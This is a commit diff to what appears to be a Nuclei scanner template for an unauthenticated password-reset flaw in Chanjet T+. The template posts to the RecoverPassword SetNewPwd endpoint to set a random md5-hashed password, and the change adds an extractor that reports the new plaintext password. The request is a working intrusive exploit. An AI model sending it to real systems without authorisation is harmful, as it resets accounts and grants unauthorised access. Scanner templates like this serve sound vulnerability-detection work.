Update chanjet-tplus-unauth-update.yaml

patch-1
Prince Chaddha 2024-02-28 09:58:47 +05:30 committed by GitHub
parent 2baf5c59d4
commit da6554fe50
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 10 additions and 1 deletions

View File

@ -11,13 +11,17 @@ info:
verified: true
tags: tplus,unauth,chanjet,intrusive
variables:
password: '{{randstr}}'
hash: '{{md5("{{password}}")}}'
http:
- method: GET
path:
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
body: |
{"pwdNew":"{{md5(randstr)}}"}
{"pwdNew":"{{hash}}"}
matchers-condition: and
matchers:
@ -34,3 +38,8 @@ http:
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"Password: " + password'